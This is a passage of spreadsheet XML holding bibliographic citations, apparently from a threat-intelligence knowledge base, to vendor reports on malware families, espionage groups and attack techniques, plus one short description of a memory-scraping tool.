    <t>Kafka, F. (2018, January). ESET's Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.</t>
  </si>
  <si>
    <t>Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.</t>
  </si>
  <si>
    <t>Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.</t>
  </si>
  <si>
    <t>ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.</t>
  </si>
  <si>
    <t>Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021.</t>
  </si>
  <si>
    <t>ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.</t>
  </si>
  <si>
    <t>Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.</t>
  </si>
  <si>
    <t>ESET. (2022, February 24). HermeticWiper: New data wiping malware hits Ukraine. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine. Retrieved April 10, 2022.</t>
  </si>
  <si>
    <t>Hromcová, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.</t>
  </si>
  <si>
    <t>Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.</t>
  </si>
  <si>
    <t>Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.</t>
  </si>
  <si>
    <t>M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos – A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.</t>
  </si>
  <si>
    <t>Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.</t>
  </si>
  <si>
    <t>Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.</t>
  </si>
  <si>
    <t>ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.</t>
  </si>
  <si>
    <t>Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.</t>
  </si>
  <si>
    <t>ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.</t>
  </si>
  <si>
    <t>Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.</t>
  </si>
  <si>
    <t>Dumont, R.. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019.</t>
  </si>
  <si>
    <t>Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.</t>
  </si>
  <si>
    <t>M. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech‑companies misused in Plead malware campaign. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.</t>
  </si>
  <si>
    <t>ESET Research. (2020, October 1). ESET Research Tweet Linking Slothfulmedia and PowerPool. Retrieved November 17, 2020.</t>
  </si>
  <si>
    <t>Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.</t>
  </si>
  <si>
    <t>Boutin, J. and Faou, M. (2018). Visiting the snake nest. Retrieved May 7, 2019.</t>
  </si>
  <si>
    <t>ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.</t>
  </si>
  <si>
    <t>ESET Research. (2015, July 10). Sednit APT Group Meets Hacking Team. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.</t>
  </si>
  <si>
    <t>ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.</t>
  </si>
  <si>
    <t>ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.</t>
  </si>
  <si>
    <t>Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.</t>
  </si>
  <si>
    <t>Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.</t>
  </si>
  <si>
    <t>ESET. (2022, February). THREAT REPORT T3 2021. Retrieved February 10, 2022.</t>
  </si>
  <si>
    <t>Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.</t>
  </si>
  <si>
    <t>Boutin, J. (2020, October 12). ESET takes part in global operation to disrupt Trickbot. Retrieved March 15, 2021.</t>
  </si>
  <si>
    <t>ESET. (2018, August). Turla Outlook Backdoor: Analysis of an unusual Turla backdoor. Retrieved March 11, 2019.</t>
  </si>
  <si>
    <t>ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.</t>
  </si>
  <si>
    <t>Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022.</t>
  </si>
  <si>
    <t>Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., Léveillé, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo – the vivisection of a large Linux server‑side credential‑stealing malware campaign. Retrieved February 10, 2021.</t>
  </si>
  <si>
    <t>ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.</t>
  </si>
  <si>
    <t>ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.</t>
  </si>
  <si>
    <t>ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US  출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.</t>
  </si>
  <si>
    <t>Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.</t>
  </si>
  <si>
    <t>Eclypsium, Advanced Intelligence. (2020, December 1). TRICKBOT NOW OFFERS ‘TRICKBOOT’: PERSIST, BRICK, PROFIT. Retrieved March 15, 2021.</t>
  </si>
  <si>
    <t>Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.</t>
  </si>
  <si>
    <t>Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence &amp; Evasion with the COM. Retrieved September 15, 2016.</t>
  </si>
  <si>
    <t>Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.</t>
  </si>
  <si>
    <t>Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.</t>
  </si>
  <si>
    <t>Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.</t>
  </si>
  <si>
    <t>Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.</t>
  </si>
  <si>
    <t>Edwards, M. (2007, March 14). EldoS Provides Raw Disk Access for Vista and XP. Retrieved March 26, 2019.</t>
  </si>
  <si>
    <t>Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.</t>
  </si>
  <si>
    <t>Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.</t>
  </si>
  <si>
    <t>Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.</t>
  </si>
  <si>
    <t>Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.</t>
  </si>
  <si>
    <t>Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.</t>
  </si>
  <si>
    <t>Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.</t>
  </si>
  <si>
    <t>Sanmillan, I.. (2020, May 13). Ramsay: A cyber‑espionage toolkit tailored for air‑gapped networks. Retrieved May 27, 2020.</t>
  </si>
  <si>
    <t>Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.</t>
  </si>
  <si>
    <t>Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.</t>
  </si>
  <si>
    <t>Gretzky, K.. (2018, July 26). Evilginx 2 - Next Generation of Phishing 2FA Tokens. Retrieved October 14, 2019.</t>
  </si>
  <si>
    <t>Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.</t>
  </si>
  <si>
    <t>Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.</t>
  </si>
  <si>
    <t xml:space="preserve"> Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022.</t>
  </si>
  <si>
    <t>S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.</t>
  </si>
  <si>
    <t>A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.</t>
  </si>
  <si>
    <t>Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.</t>
  </si>
  <si>
    <t>Zhaohui Wang &amp; Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.</t>
  </si>
  <si>
    <t>Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>F-Secure Labs. (2014). BlackEnergy &amp; Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.</t>
  </si>
  <si>
    <t>F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.</t>
  </si>
  <si>
    <t>F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.</t>
  </si>
  <si>
    <t>F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.</t>
  </si>
  <si>
    <t>FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.</t>
  </si>
  <si>
    <t>FBI. (2022, January 19). Indicators of Compromise Associated with Diavol. Retrieved March 9, 2022.</t>
  </si>
  <si>
    <t>The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.</t>
  </si>
  <si>
    <t>FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>The FIENDCRY component is a memory scraper based on MemPDump that scans through process memory looking for regular expressions. Its stage 1 component scans all processes, and its stage 2 component targets a specific process of interest. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: Github Mempdump) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.</t>
  </si>
  <si>
    <t>FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.</t>
  </si>
  <si>
    <t>FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020.</t>
  </si>
  <si>
    <t>Albors, Josep. (2017, January 12). Fast Flux networks: What are they and how do they work?. Retrieved March 11, 2020.</t>
  </si>
  <si>
    <t>Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.</t>
  </si>
  <si>
    <t>Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016.</t>
  </si>
  <si>
    <t>Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.</t>
  </si>
  <si>
    <t>FinFisher. (n.d.). Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Microsoft Defender Security Research Team. (2018, March 1). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved January 27, 2022.</t>
  </si>
  <si>
    <t>Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.</t>
  </si>
  <si>
    <t>Bierstock, D., Baker, A. (2019, March 21). I am AD FS and So Can You. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>FireEye. (n.d.). Advanced Persistent Threat Groups. Retrieved August 3, 2018.</t>
  </si>
  <si>
    <t>FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.</t>
  </si>
  <si>
    <t>Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.</t>
  </si>
  <si>
    <t>FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.</t>
  </si>
  <si>
    <t>FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.</t>
  </si>
  <si>
    <t>Smith, L. and Read, B.. (2017, August 11). APT28 Targets Hospitality Sector, Presents Threat to Travelers. Retrieved August 17, 2017.</t>
  </si>
  <si>
    <t>FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.</t>
  </si>
  <si>
    <t>Dunwoody, M. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved March 27, 2017.</t>
  </si>
  <si>
    <t>Matthew Dunwoody. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved November 20, 2017.</t>
  </si>
  <si>
    <t>Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.</t>
  </si>
  <si>
    <t>FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.</t>
  </si>
  <si>
    <t>Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020.</t>
  </si>
  <si>
    <t>Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.</t>
  </si>
  <si>
    <t>Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.</t>
  </si>
  <si>
    <t>O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Bromiley, M., et al.. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.</t>
  </si>
  <si>
    <t>Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.</t>
  </si>
  <si>
    <t>FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.</t>
  </si>
  <si>
    <t>FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.</t>
  </si>
  <si>
    <t>Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.</t>
  </si>
  <si>
    <t>FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.</t>
  </si>
  <si>
    <t>Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.</t>
  </si>
  <si>
    <t>Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.</t>
  </si>
  <si>
    <t>Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020.</t>
  </si>
  <si>
    <t>Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.</t>
  </si>
  <si>
    <t>Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020.</t>
  </si>
  <si>
    <t>Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.</t>
  </si>
  <si>
    <t>Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.</t>
  </si>
  <si>
    <t>Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>FireEye. (n.d.). Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.</t>
  </si>
  <si>
    <t>Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Bromiley, M. et al. (2021, March 4). Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities. Retrieved March 9, 2021.</t>
  </si>
  <si>
    <t>Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.</t>
  </si>
  <si>
    <t>FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.</t>
  </si>
  <si>
    <t>Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018.</t>
  </si>
  <si>
    <t>McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.</t>
  </si>
  <si>
    <t>Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.</t>
  </si>
  <si>
    <t>Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.</t>
  </si>
  <si>
    <t>Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.</t>
  </si>
  <si>
    <t>Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques. Retrieved October 11, 2019.</t>
  </si>
  <si>
    <t>Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.</t>
  </si>
  <si>
    <t>Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Brubaker, N. Zafra, D. K. Lunden, K. Proska, K. Hildebrandt, C.. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. Retrieved February 15, 2021.</t>
  </si>
  <si>
    <t>McLellan, T.  and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.</t>
  </si>
  <si>
    <t>Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.</t>
  </si>
  <si>
    <t>Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.</t>
  </si>
  <si>
    <t>Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.</t>
  </si>
  <si>
    <t>Vengerik, B. &amp; Dennesen, K.. (2014, December 5). Hacking the Street?  FIN4 Likely Playing the Market. Retrieved January 15, 2019.</t>
  </si>
  <si>
    <t>FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.</t>
  </si>
  <si>
    <t>Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020.</t>
  </si>
  <si>
    <t>Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.</t>
  </si>
  <si>
